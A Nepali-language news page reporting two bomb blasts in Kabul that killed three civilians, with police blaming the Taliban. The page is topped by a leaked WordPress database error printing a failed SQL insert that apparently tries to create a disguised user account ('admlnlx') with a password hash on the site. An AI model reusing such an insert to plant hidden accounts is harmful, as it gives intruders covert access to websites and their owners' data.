WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/KIzWe6FvVBOnPsssbgx0QMatnc2g.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:32:30', '', 'admlnlx', 'admlnlx')
अफगानिस्तानको राजधानी काबुल शहरका दुई फरक स्थानमा आइतबार भएका बम विस्फोटमा परी तीन जना सर्वसाधारण नागरिकको ज्यान गएको बताएको छ । अफगान प्रहरीका अनुसार ती दुवै स्थानमा यहाँका तालिबानहरुले विस्फोटक पदार्थ विस्फोट गराएर तीन जना सर्वसाधारणको ज्यान लिएका काबुल प्रहरीका प्रवक्ता फेडरस फरामर्जाले पुष्टि गरेको छ ।
उहाँका अनुसार सो विस्फोटमा परी अरु पनि कैयौँ सर्वसाधारण घाइते भएका छन् । घाइतेहरुको स्थानीय अस्पतालमा उपचार जारी रहेको छ । उहाँले केही घाइतेहरुको अवस्था निकै नाजुक रहेको पनि बताउनुभएको छ । जसका कारण मृत्यु हुनेको संख्या बढ्न पनि सक्नेछ ।
यस घटनाको अहिलेसम्म कसैले पनि जिम्मेवारी लिएको छैन । तर प्रहरीले भने यो आक्रमण तालिबानीहरुले नै गरेका बताएको छ ।